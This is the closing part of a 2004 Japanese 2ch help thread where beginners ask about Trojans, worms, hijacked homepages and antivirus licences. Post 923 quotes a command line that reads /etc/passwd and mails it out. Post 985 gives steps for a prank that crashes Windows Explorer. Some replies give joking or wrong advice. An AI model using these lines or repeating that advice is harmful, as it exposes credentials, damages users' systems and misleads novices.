手動で駆除しようとしたってこと?

899 :897:04/08/05 04:16 ID:???
>>898
システムの完全スキャンをしました。

900 :ひよこ名無しさん:04/08/05 04:21 ID:???
シマンテックのページを見る限りでは……。


システムの復元オプションを無効化後
修復モードで起動してファイルを削除。

コレで良いと思う。

901 :897:04/08/05 05:08 ID:???
>>900
ウチは2000なので、システムの復元オプションの無効化は無視しました。
シマンテックのページを見る限り、それでよさそうでしたので。

修復モードで起動というのがよく分からないのですが、どういうことでしょうか。

902 :ひよこ名無しさん:04/08/05 05:28 ID:???
>>901
修復モードで起動→セーフモード。


903 :ひよこ名無しさん:04/08/05 05:30 ID:???
>>901
ここ読んでやってみな
http://www.symantec.com/region/jp/sarcj/data/t/trojan.byteverify.html

904 :897:04/08/05 06:54 ID:???
>>902>>903
修復モード=セーフモードということでしたか。

903さんのおっしゃられたページを参考にして、これまで作業をしてきたんですが、
最後の4番目、「感染ファイルの削除」というところで詰まっています。

システム全体のスキャンをしても、検疫のところにあるからなのか、ウィルスが見つかりません。
単純に、検疫フォルダにあるウィルスファイルを削除してしまえばいいということなんでしょうか。

もしそうだとしたら、この2つのファイルは削除してしまっていいファイルなんでしょうか。

905 :ひよこ名無しさん:04/08/05 09:16 ID:???
>>904
トロイの本体ファイル持っててどうすんの?

906 :890:04/08/05 18:35 ID:???
どなたかご存知の方いませんか?
ウィルスバスター2004の評価版を使っていて、試用期限が切れたのですが
まだプロダクトファイルのアップデートが定期的にされ続けてます。
このままでいいんでしょうか?

907 :ひよこ名無しさん:04/08/05 20:17 ID:???
>>906
情報取られて逮捕。

908 :897:04/08/05 23:27 ID:???
>>905
もちろんウイルスファイルを捨てることが第一なんですが、
Counter.classとVerifierBug.classのファイルを削除することで、何か不具合があったらイヤだなぁと思いまして。

909 :ひよこ名無しさん:04/08/06 08:08 ID:???
>>908
削除しなくていいよ 誰も何も困る事はない

910 :ひよこ名無しさん:04/08/06 12:52 ID:???
>>908
削除しないとウィルスはPCの中に居座ったままだ。
ちなみに消さなくても私は困らない

911 :ひよこ名無しさん:04/08/06 18:40 ID:???
すみませんが、どなたか教えていただけると幸いです。
ttp://www5f.biglobe.ne.jp/~imasaki/
↑このURLを踏んでしまったのですが、ウィルス感染はするのでしょうか?
オンラインスキャンをしてみたら、一個も出なかったので安心したのですが・・・。

お願いいたします・・・。

912 :ひよこ名無しさん:04/08/06 18:48 ID:76/PKdYY
度々ほんっとすみません!sage入れっぱなしでした・・・。

すみませんが、どなたか教えていただけると幸いです。
ttp://www5f.biglobe.ne.jp/~imasaki/
↑このURLを踏んでしまったのですが、ウィルス感染はするのでしょうか?
オンラインスキャンをしてみたら、一個も出なかったので安心したのですが・・・。

お願いいたします・・・。


913 :ひよこ名無しさん:04/08/06 18:49 ID:???
>>912
窓の手使え

914 :ひよこ名無しさん:04/08/06 18:55 ID:???
>>912
ざけんな 何にも表示されめえよ

915 :912:04/08/06 19:01 ID:76/PKdYY
>>913
レスありがとうございます!
インストールしてみました。

>>914
URLを開くとウィルス感染してしまう類の物かと思っていたんです・・・。
何もないページで、ウィルスもないのでしょうか?

お手数をお掛けしてすみません・・・。

916 :ひよこ名無しさん:04/08/06 19:26 ID:???
質問です。
ウィルスにやられてしまい、PCも立ち上げることができなくなってしまった(起動しようとすると青い画面が出て最初に戻ってしまいます。)のでフォーマットしようと思います。
壊れる前にリカバリディスクを作っていなかったのですが、
他のPCからでも作ることはできますか?

917 :ひよこ名無しさん:04/08/06 19:28 ID:???
そしてOSは不明と

918 :ひよこ名無しさん:04/08/06 19:31 ID:???
>>916
※E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)

919 :916:04/08/06 19:43 ID:90pWnYB5
すいませんでした。
OSはXP HOME EDITION
SONY VAIO GRX 52です。

920 :ひよこ名無しさん:04/08/06 19:47 ID:???
>>919
まったく同じ機種のなら借りて使える。
実費でSONYから買う方法もある。

921 :ひよこ名無しさん:04/08/06 19:49 ID:???
>>919
ソニーから購入だな。<リカバリディスク

922 :ひよこ名無しさん:04/08/06 19:50 ID:???
>>915
ここは鑑定スレじゃない

923 :ひよこ名無しさん:04/08/06 21:19 ID:9xTOXUkL
きゃっと/えとせとら/ぱすwd| めーる のーばでぃ
実際は英語で書かれて居るのですが、
これってウィルスですか?
よろしくお願いします

パソコン初心者板総合質問スレで聞いたのですが、
今になってウィルスに関する質問だからこっちか。
と気づいたのでマルチポストになってます。すみません。

924 :ひよこ名無しさん:04/08/06 21:21 ID:???
>>923
質問するまでもなく、このスレを見ればわかるよ
ノートンがvbsウィルスのソースに誤反応2
http://pc6.2ch.net/test/read.cgi/pcqa/1033948204/


925 :923:04/08/06 21:24 ID:9xTOXUkL
>>924
やっぱりノートンの誤反応でしたか・・・。
ありがとうございました。

926 :ひよこ名無しさん:04/08/06 21:37 ID:???
>>925
ID出さなかったからスルーされてただけだ

927 :ひよこ名無しさん:04/08/06 22:32 ID:gSncYd7k
マウスのポインタが画面の端の方に勝手に一瞬のうちに動く時があります。
普通にマウスを触っているだけで、特に動かしているわけでもありません。
同じマウスを会社でも使っているのですが、自宅のマウスだけがおかしいです。
マウスのプロパティなどを見てみましたが、正常に動いてるらしく原因がわかりません。
スパイウェアとやらなのでしょうか?

928 :ひよこ名無しさん:04/08/06 22:33 ID:???
>>927
違う
つーかいずれにせよスレ違い

929 :ひよこ名無しさん:04/08/06 23:12 ID:Jk8VN+nf
ttp://www5d.biglobe.ne.jp/~marudash/img-box/img20040806045659.jpg

あのここ開いたらウィルスに感染してしまったんですけど、
なんのウィルスかわかりますか?鑑定スレはどこにあるんでしょうか?

930 :ひよこ名無しさん:04/08/06 23:19 ID:???
>>929
なんのウィルスかわからないのに、「ウィルスに感染した」って
断言できるの?

エロサイト見たら…助けてください!Part36
http://pc6.2ch.net/test/read.cgi/pcqa/1091521211/

こっち行って、テンプレに書いてある事全部試してみなさいな。

931 :929:04/08/06 23:23 ID:Jk8VN+nf
>>930
いや開いたら画面が切り替わってウィルスに感染しましたとメッセージが出たので
ファイル2つを検疫したんですけどなんのウィルスなのかなあと。

932 :ひよこ名無しさん:04/08/06 23:25 ID:???
>>929
勇気が無くて見られない画像解説スレ Part597
http://etc3.2ch.net/test/read.cgi/entrance/1091760116/
既出かどうか検索してから書き込めよ。

933 :ひよこ名無しさん:04/08/07 00:36 ID:0895oaLF
YBBの無料キャンペーンのヤツやってたものですが、期限期限うるさいので
ノートンアンチウィルス2004延長キーを購入して、単にこのキーを入力すれば
延長するんだろうと思っていたところ
YBBバージョンはシマンテックのサポート外とか書いてありまして
どうしたもんでしょうか、、延長キー間違って買ったっぽいですが・・
返金とかできませんか?というか、YBBのバージョンとか全く意味不明です
大体アンチウィルスとインターネットセキュリティって二つ?ある意味もわからないのに・・
全部まとめて1個!で売ってくれ。。


934 :ひよこ名無しさん:04/08/07 11:06 ID:bHNAVXEM
ぬるぽに感染してウイルスバスターでウイルス駆除もしたんですが、
XPでスタート→すべてのプログラム→ファイルを選んで右クリックすると
”開く” ”別のユーザーとして実行(A)”の下が空白で直りません。
直し方を教えて下さい。
お願いします。



935 :ひよこ名無しさん:04/08/07 11:10 ID:???
>>934
“ガッ”と一撃を食らわす。

936 :ひよこ名無しさん:04/08/07 12:25 ID:1IUSEMb7

ttp://start-page.info/?u=1526

ホムペをクリックするとこの外人のページに切り替わる。
インターネットオプションでホムペを変えても
すぐにホムペがこれになる。


ttp://www.pretty-teens.info/

お気に入りにこれが追加されてる。消してもすぐにこれがお気に入りに
追加される。

パソコン初心者板でも聞きましたが マルチ扱いされて
答えてもらえませんでした。
これは一体どういう事でしょう。


937 :ひよこ名無しさん:04/08/07 14:08 ID:???
>>936
エロサイトスレ逝ってテンプレ実行

938 :ひよこ名無しさん:04/08/07 16:22 ID:2FOK4BPY
最近よくウィルスがくるんですけど、メールアドレスからドメインって調べられるのですか?
初心者でスイマセン

939 :ぼるじょあ ◆yBEncckFOU :04/08/07 16:35 ID:???
(・3・) エェー 君はドメインって言う単語を調べたほうが良いYO

940 :ひよこ名無しさん:04/08/07 18:49 ID:???
メールアドレスには、でっかいドメインが入っているね

941 :ひよこ名無しさん:04/08/07 19:04 ID:Dy2g/8Xp
ありがとうございます。
@以降をドメインっていうんですか?
IPアドレスを調べることはできないのですか?

942 :ひよこ名無しさん:04/08/07 19:05 ID:???
>>941
というか特定したところでなんかできるわけじゃないし
最近のウイルスはメールアドレス詐称するのがデフォ

素直にメッセージルールかなんかでゴミ箱送りにした方がいいと思うぞ

943 :890:04/08/07 21:09 ID:???
>>907
情報取られて逮捕とはどういう意味でしょうか?

とにかくウィルスバスター2004の評価版が試用期限切れたあともアップデートされ続ける
現象についてお聞きしたいです。購入する必要はないのでしょうか?よろしくおねがいします。

944 :ひよこ名無しさん:04/08/07 21:18 ID:???
>>943
猶予期間

945 :890:04/08/07 22:23 ID:???
猶予期間でしたか。サンクス。

946 :ひよこ名無しさん:04/08/07 23:02 ID:VaBUSd95
PC初心者です。
SPYBOTっていうのを使ってるんですが、いつも同じ物がひっかかるのです。
’PurityScan’ ’CnsMin’ ’DSO Exploit’
上記3つです。なぜか削除も修復もできない・・・
どなたか助けてぷり〜ず。

947 :ひよこ名無しさん:04/08/07 23:04 ID:???
>>946
エロサイト見たら…助けてください!Part36
http://pc6.2ch.net/test/read.cgi/pcqa/1091521211/
こっちのテンプレを確認してみろ

948 :ひよこ名無しさん:04/08/07 23:20 ID:???
ファイルをダウンロードしたら起動時に、

ぬるぽ ぬるぽ オートラン♪
ヌルポ ヌルポ AutoRun♪
ぬるぽ ぬるぽ オートラン♪
おまえが踏まなきゃ誰が踏む!

というのが出るようになりました。
調べてみたところ、winnyやっていると感染するらしいですが、私はやってないです。
「.exe」というファイルを削除したら症状はなくなったのですが、これで大丈夫でしょうか。
ダウンロード板の方は難しくてよく分からないです。御教授お願いします。

949 :946:04/08/07 23:20 ID:VaBUSd95
ありがとうございます。早速見てみます。

950 :ひよこ名無しさん:04/08/07 23:21 ID:???
>>946
【雑談禁止】スパイウェア削除ソフトSpybot 15
http://pc5.2ch.net/test/read.cgi/sec/1090594050/8
DSO Exploitについてはココ読んでから>>947

951 :ひよこ名無しさん:04/08/08 03:01 ID:ZrEc/Zof

Explorer.exeにW32/Backdoor-cfbというウィルスが検出されたんですが
どうすれば駆除できるのでしょうか?

952 :ひよこ名無しさん:04/08/08 03:12 ID:???
>>951
削除する

953 :ひよこ名無しさん:04/08/08 04:41 ID:Olk3x6Z9
パソコン初心者なのですが

PE_PARITE.A-1
PE_PARITE.A

とゆうのがウィルス検索をしたら出てきたのですが
何をどうすればいいのでしょうか?

954 :ひよこ名無しさん:04/08/08 04:47 ID:???
PE_PARITE.A-1
PE_PARITE.A



駆除すれば良い

955 :ぼるじょあ ◆yBEncckFOU :04/08/08 04:47 ID:???
(・3・) エェー ココ行けよ↓
     http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=PE_PARITE.A
     http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=PE_PARITE.A-1

956 :ぼるじょあ ◆yBEncckFOU :04/08/08 04:50 ID:???
(・3・) エェー A1の方は確かキケンなウイルスだYO

957 :ひよこ名無しさん:04/08/08 04:57 ID:???
どう危険なのさ?

958 :953:04/08/08 04:57 ID:Olk3x6Z9
検索結果の表示が
C:\Documents and ・・・
までしか表示されなくてどのファイルに感染してるのかが解からないんですが
どうしたらよろしいのでしょうか?

959 :ひよこ名無しさん:04/08/08 04:58 ID:???
ダメージでかい。<危険

960 :ひよこ名無しさん:04/08/08 04:59 ID:???
>>958
お前アホだなぁ。上にある縦のラインを引っ張って伸ばせば全部表示できる。


961 :ひよこ名無しさん:04/08/08 05:00 ID:???
>>957
パソコンが大爆発すんだよ。

962 :953:04/08/08 05:47 ID:Olk3x6Z9
C:Documents and Settings\Owner\Local Settings\Temp\bon32.tmp

でPE_PARITE.A-1が検出されたのですがOwnerとゆうファイルは見つけたのですが
その中にLocal Settingsとゆうファイルが見つからず先に進めませんどうしたらいいのでしょう?

あとPE_PARITE.Aの方も全部削除しなくてはならないのでしょうか?
2回検索したのですが
感染ファイルの数が一回目の時は120個くらいだったのに
二回目は800個を超えたんですが・・・

ちなみにPE_PARITE.A-1の方は一個だけでした

>>960
見れましたどうもです

963 :ひよこ名無しさん:04/08/08 05:54 ID:???
>>962
ハゲには無理。

964 :ひよこ名無しさん:04/08/08 06:08 ID:???
>>962
言うまでもないが、感染が広がっていってる。
そういった感染を防ぐためのアンチウィルスソフトなんだから
全てお前のせい。いまさら遅い。PCを買ったときの状態に戻すんだな。

965 :ひよこ名無しさん:04/08/08 06:28 ID:???
>>962
ツール>フォルダオプション>表示>ファイルとフォルダの表示>すべてのファイルとフォルダを表示するにチェック

PE_PARITE.Aは見つかったものをすべて削除
PE_PARITE.A-1は>>955のリンク先見て手動削除

966 :ひよこ名無しさん:04/08/08 11:19 ID:X0/W9Jiy
質問させてください。昨日ディズニー関係のHPを開いたら突然トロイの木馬に感染しました。

マカフィーウィルススキャンを使ってウィルスを駆除したんですが、デスクトップ画像が真っ黒で赤い文字になったまま治りません。

インターネットにつなげようとすると変な青い英語の警告文がでてきます。

どうしたらよいのか教えて下さい…

967 :ひよこ名無しさん:04/08/08 11:36 ID:???
ディズニーチケット買え

968 :ひよこ名無しさん:04/08/08 12:29 ID:???
>>966
こっちに移動
テンプレよく読んで実行、質問はその後

エロサイト見たら…助けてください!Part36
http://pc6.2ch.net/test/read.cgi/pcqa/1091521211/


969 :ひよこ名無しさん:04/08/08 15:04 ID:QD9P8abQ
PC起動時に勝手にデスクトップの壁紙が変わってしまいます。
これはウィルスなのでしょうか?

970 :ひよこ名無しさん:04/08/08 16:25 ID:???
>>969
増殖活動をしないものは、ウィルスではありません
不正プログラムと呼びます

971 :ひよこ名無しさん:04/08/08 16:58 ID:???
>>670
ありがとうございました。

972 :ひよこ名無しさん:04/08/08 17:38 ID:???
トレンドマイクロのオンラインスキャンが表示できないんだが
漏れだけかな? もしかして落ちてる?

973 :ひよこ名無しさん:04/08/08 17:51 ID:???
>>972
スキャンできるよ
落ちてはいないようだ

974 :ひよこ名無しさん:04/08/08 18:55 ID:???
>>973
今になって漏れも出来るようになった。
17:38頃は出来なかったのだがなあ・・・・・・
まあ、出来るようになったからもうどうでもいいや。
お騒がせしますた。

975 :ひよこ名無しさん:04/08/09 04:20 ID:???
超初心者なのですが、質問させてください。
ウィルスやトロイの木馬って、画像や動画を流出させる事が、
ありえるのでしょうか?

976 :ひよこ名無しさん:04/08/09 17:22 ID:???
すいません、質問させて下さい。

BKDR_TILLAH.Bっていうウイルスに感染したんですけど、
5月に買い換えたXPにノートンのお試し版みたいなのがついてて。
保障期間内のアップデートが可能になってたので、ライブアップデート
実行し、感染したとされる156個の内の78個を削除することに成功しますた。
駆除の直後に、「このコンピュータはまだ危険です」みたいな警告を
出されていたのですが、再起動し、再びスキャニングをしてみたところ
ウイルスが検出されず、メッセージの方も「問題ありません」となってました。

疑問に思ったので他のオンラインスキャンサービスでも試してみたのですが、
いずれも「ウイルスは検出されませんでした」となりまうす。
これって、もう全て駆除されたと信じていいんでしょうか?

977 :976:04/08/09 17:31 ID:26sErh+4
スマソ、ID出してませんでした

978 :ひよこ名無しさん:04/08/09 17:55 ID:???
>>977
定期的にスキャンを行ってその結果を信じるしかない。
はやく製品版購入した方がいいよ。試用期間が過ぎて
使い続けている人がよくいるけど、
ウィルス定義はいつでも最新のものにしておかないとまるで意味がないからね。

979 :ひよこ名無しさん:04/08/09 17:58 ID:???
>>975
ありえます。

980 :ひよこ名無しさん:04/08/09 21:15 ID:???
>>978
そうですか・・・分かりました。なるべく早く購入します。
回答ありがとうございました

981 :ひよこ名無しさん:04/08/09 23:43 ID:s49pbkeM
>>979
回答ありがとうございます。
でも、はぁ・・・、ありえるのですか。コワ〜。
最近、ウイルスチェックしたらたくさんかかっていたので、
ソフトを買ってそれらを削除しました。
でも、いちいちどのファイルにかかっているかは確認しませんでした。
どうでもいい話なんですが、僕はゲイでパソコンの中に恋人との
ヤバイ写真や動画をけっこう保存していて、万が一それが
流れているような事があったのなら、かなりキツイなぁ、というか、
もう生きていけないなとw 心配したのです。
ウィルスやトロイの木馬の事を少しだけ調べたら個人情報や文書の
事例ばかりだったので、映像が流れる事なんてありえるのかなと、
思いました。(普通のウィルスにはそんなことはできない?)
でもwinnyもやっていないし、まぁ大丈夫だとは思いますけど。
あ〜、でもウィルスって怖いな。


982 :ひよこ名無しさん:04/08/09 23:46 ID:???
>>981
そういうのはCDに焼いて保存しといたほうがいいよ
ウィルス関係なく、消えたら困る大事なものだろうし

983 :979:04/08/10 00:08 ID:???
>>981
nyやってなくて、アンチウイルスソフトの最新版を常駐させておけば、まずは大丈夫です。
でも、ドライブあぼーんの凶悪なトロイなんかもありますので>>982さんの言うように大切な
ファイルはバックアップとっておいた方が良いでしょう。

984 :981:04/08/10 00:30 ID:???
>>982>>983
これからはCDに保存することにします。
ありがとうございました。


985 :ひよこ名無しさん:04/08/10 00:49 ID:???
大発見!!!

1.XPでデスクトップにデスクトップというフォルダを作成
2.そのフォルダを開いて新しいフォルダ(名前はなんでもいい)を作成する
3.そのフォルダを開く ※何も起きない場合は2,3を繰り返す
4.アラートが出る
5.マイコンピューターを開こうとすると・・・
6.うあああああああああ!!!!

パソコン壊したい奴だけやってね

986 :ひよこ名無しさん:04/08/10 01:44 ID:???
1.XPでデスクトップにデスクトップというフォルダを作成
2.そのフォルダを開いて新しいフォルダ(名前はなんでもいい)を作成する
3.そのフォルダを開く ※何も起きない場合は2,3を繰り返す
4.アラートが出る
5.マイコンピューターを開こうとすると・・・
6.キタ━━(━(━(-( ( (゚∀゚) ) )-)━)━) ━━ !!!!!

987 :ひよこ名無しさん:04/08/10 02:38 ID:S8ux2YZw
ttp://www.nurs.or.jp/~gatoo777/souko_gif/roo/4.html
(ブラクラです)
これ踏んじゃいました・・・OTL
赤い部屋、好きですか? とか出てきて
いきなり怖い女の人が出てくる奴です・・・

ウィルススキャンかけてますが、大丈夫でしょうか・・・

988 :ひよこ名無しさん:04/08/10 02:48 ID:/askOJqZ
klez等の協力なウイルスを作った人って誰なんですか?

989 :ひよこ名無しさん:04/08/10 03:33 ID:???
>>988
呼んだ?

990 :ひよこ名無しさん:04/08/10 17:04 ID:QOPmkVTe
数ヶ月前から変な海外からの「WORM_NETSKY_P」とか「WORM_NETSKY_Q」
とかのウイルスメールが届いていて
ウイルスバスターが反応して消してたのでほうっておいたのですが、
これらは自分から自分に送られてるものかもしれないって聞いたのですが
ウイルスバスターで検索しても反応しないし、レジストリ覗いても発見できないの
どうやって駆除すればいいかわからなくて迷ってます。
この状態でWinny起動してるとやばいですかね?

991 :ひよこ名無しさん:04/08/10 17:04 ID:???
>>990
解りやすい釣りだな。

992 :ひよこ名無しさん:04/08/10 17:09 ID:PMBAKNgm
何かまずいファイルありますか?

ttp://up.isp.2ch.net/up/b5c79f951bf1.PNG

993 :990:04/08/10 17:11 ID:QOPmkVTe
すみません、全然つりじゃないつもりです。。。

994 :ひよこ名無しさん:04/08/10 17:11 ID:???
>>992
マルチ死ね。

995 :992:04/08/10 17:15 ID:PMBAKNgm
総合質問スレッドから誘導されてきました。
書き忘れてすみません

996 :ひよこ名無しさん:04/08/10 17:24 ID:???
>>992
ttp://www.vector.co.jp/soft/winnt/util/se221254.html


997 :ひよこ名無しさん:04/08/10 18:58 ID:???
997

998 :ひよこ名無しさん:04/08/10 19:06 ID:???
998

999 :わたしはメーテル:04/08/10 19:07 ID:???
     }                     }
     }                    /  o ゚.  
.     〉'' ,、,,,__               ノ} 。 :∴   
     i ムツッ=,ニ_゙゙"''‐- 、、,,,__,,..,,,.. -‐'''"/ 。 X,,    999はいただくわ
     l {{ ハ` `゚'~`  ,‐-,ニ二ヾ,,_ヽ   /   i'(_,.l\
      〉、`ハ    }  ` `゚'゙゙” }}'゙   ,'    ti=ti、iiヽ
.     / ハヽハ  ノ       //    {      ゙ヾヽ}
    / /ハヽヘ  `、_   (Cノ/  /  ハ      ノラ
   / // } Y゙\ `   Cノイ  /    \    〆'
. / / / /  ,ゞ,, `-‐ ''´〆⌒ヽ{  ,' ハ   \
 ;''"''ヾノ /_,/  `'' ァ''7/     \l l ヽヾ   \
 ゞ..,,.'' ̄//    ''´ //       \  \ヾ   \

1000 :ぼるじょあ ◆yBEncckFOU :04/08/10 19:07 ID:???
             / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
             |  ぼるじょあが1000ゲット!!
             \
                ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   (,⌒`),⌒`)
      ⌒`)\\⌒`)
       (,⌒`),⌒`)
          \\ ∧∧
           ⌒`)(,,・3・)う
  ズザーーーーーッ! ⊂,、 ∩∩
                ゝ_'ソ

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

287 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)